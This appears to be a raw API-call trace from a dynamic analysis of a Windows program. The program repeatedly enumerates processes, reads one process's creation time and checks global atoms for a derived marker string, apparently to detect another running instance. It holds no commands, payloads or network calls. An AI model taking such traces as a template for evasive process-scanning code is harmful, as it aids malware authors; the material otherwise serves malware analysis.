	[0088.346] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.346] CloseHandle (hObject=0x20c) returned 1
	[0088.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.346] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.346] CloseHandle (hObject=0x20c) returned 1
	[0088.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.346] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.346] CloseHandle (hObject=0x20c) returned 1
	[0088.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.346] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.346] CloseHandle (hObject=0x20c) returned 1
	[0088.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.346] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.346] CloseHandle (hObject=0x20c) returned 1
	[0088.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.347] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.347] CloseHandle (hObject=0x20c) returned 1
	[0088.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.347] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.347] CloseHandle (hObject=0x20c) returned 1
	[0088.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.347] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.347] CloseHandle (hObject=0x20c) returned 1
	[0088.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.347] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.347] CloseHandle (hObject=0x20c) returned 1
	[0088.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.347] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.348] CloseHandle (hObject=0x20c) returned 1
	[0088.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.348] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.348] CloseHandle (hObject=0x20c) returned 1
	[0088.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.348] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.348] CloseHandle (hObject=0x20c) returned 1
	[0088.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.348] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.348] CloseHandle (hObject=0x20c) returned 1
	[0088.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.348] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.348] CloseHandle (hObject=0x20c) returned 1
	[0088.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.349] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.349] CloseHandle (hObject=0x20c) returned 1
	[0088.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.349] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.349] CloseHandle (hObject=0x20c) returned 1
	[0088.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.349] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.349] CloseHandle (hObject=0x20c) returned 1
	[0088.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.349] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.349] CloseHandle (hObject=0x20c) returned 1
	[0088.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.349] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.349] CloseHandle (hObject=0x20c) returned 1
	[0088.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.350] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.350] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.350] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.350] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.350] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.350] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.350] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.351] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.351] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.351] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.351] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.351] CloseHandle (hObject=0x20c) returned 1
	[0088.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.351] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.351] CloseHandle (hObject=0x20c) returned 1
	[0088.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.438] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.438] CloseHandle (hObject=0x20c) returned 1
	[0088.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.438] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.438] CloseHandle (hObject=0x20c) returned 1
	[0088.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.438] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.438] CloseHandle (hObject=0x20c) returned 1
	[0088.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.442] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.442] CloseHandle (hObject=0x20c) returned 1
	[0088.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.442] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.442] CloseHandle (hObject=0x20c) returned 1
	[0088.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.442] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.442] CloseHandle (hObject=0x20c) returned 1
	[0088.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.442] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.442] CloseHandle (hObject=0x20c) returned 1
	[0088.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.442] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.443] CloseHandle (hObject=0x20c) returned 1
	[0088.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.443] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.443] CloseHandle (hObject=0x20c) returned 1
	[0088.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.443] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.443] CloseHandle (hObject=0x20c) returned 1
	[0088.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.443] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.443] CloseHandle (hObject=0x20c) returned 1
	[0088.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.443] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.443] CloseHandle (hObject=0x20c) returned 1
	[0088.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.447] CloseHandle (hObject=0x20c) returned 1
	[0088.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.447] CloseHandle (hObject=0x20c) returned 1
	[0088.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.447] CloseHandle (hObject=0x20c) returned 1
	[0088.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.447] CloseHandle (hObject=0x20c) returned 1
	[0088.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.447] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.447] CloseHandle (hObject=0x20c) returned 1
	[0088.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.448] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.448] CloseHandle (hObject=0x20c) returned 1
	[0088.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.448] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.448] CloseHandle (hObject=0x20c) returned 1
	[0088.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.448] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.448] CloseHandle (hObject=0x20c) returned 1
	[0088.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.448] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.448] CloseHandle (hObject=0x20c) returned 1
	[0088.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.449] CloseHandle (hObject=0x20c) returned 1
	[0088.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.449] CloseHandle (hObject=0x20c) returned 1
	[0088.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.449] CloseHandle (hObject=0x20c) returned 1
	[0088.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.449] CloseHandle (hObject=0x20c) returned 1
	[0088.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.449] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.449] CloseHandle (hObject=0x20c) returned 1
	[0088.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.450] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.450] CloseHandle (hObject=0x20c) returned 1
	[0088.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.450] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.450] CloseHandle (hObject=0x20c) returned 1
	[0088.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.450] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.450] CloseHandle (hObject=0x20c) returned 1
	[0088.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.450] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.450] CloseHandle (hObject=0x20c) returned 1
	[0088.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.451] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.451] CloseHandle (hObject=0x20c) returned 1
	[0088.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.451] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.451] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.451] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.451] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.451] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.452] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.452] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.452] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.452] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.452] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.452] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.452] CloseHandle (hObject=0x20c) returned 1
	[0088.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.453] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.453] CloseHandle (hObject=0x20c) returned 1
	[0088.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.491] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.491] CloseHandle (hObject=0x20c) returned 1
	[0088.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.491] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.492] CloseHandle (hObject=0x20c) returned 1
	[0088.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.492] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.492] CloseHandle (hObject=0x20c) returned 1
	[0088.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.492] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.492] CloseHandle (hObject=0x20c) returned 1
	[0088.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.492] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.492] CloseHandle (hObject=0x20c) returned 1
	[0088.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.492] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.492] CloseHandle (hObject=0x20c) returned 1
	[0088.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.492] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.493] CloseHandle (hObject=0x20c) returned 1
	[0088.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.493] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.493] CloseHandle (hObject=0x20c) returned 1
	[0088.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.493] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.493] CloseHandle (hObject=0x20c) returned 1
	[0088.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.493] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.493] CloseHandle (hObject=0x20c) returned 1
	[0088.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.493] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.493] CloseHandle (hObject=0x20c) returned 1
	[0088.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.493] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.494] CloseHandle (hObject=0x20c) returned 1
	[0088.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.494] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.494] CloseHandle (hObject=0x20c) returned 1
	[0088.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.494] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.494] CloseHandle (hObject=0x20c) returned 1
	[0088.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.494] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.494] CloseHandle (hObject=0x20c) returned 1
	[0088.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.494] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.494] CloseHandle (hObject=0x20c) returned 1
	[0088.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.494] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.494] CloseHandle (hObject=0x20c) returned 1
	[0088.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.495] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.495] CloseHandle (hObject=0x20c) returned 1
	[0088.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.495] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.495] CloseHandle (hObject=0x20c) returned 1
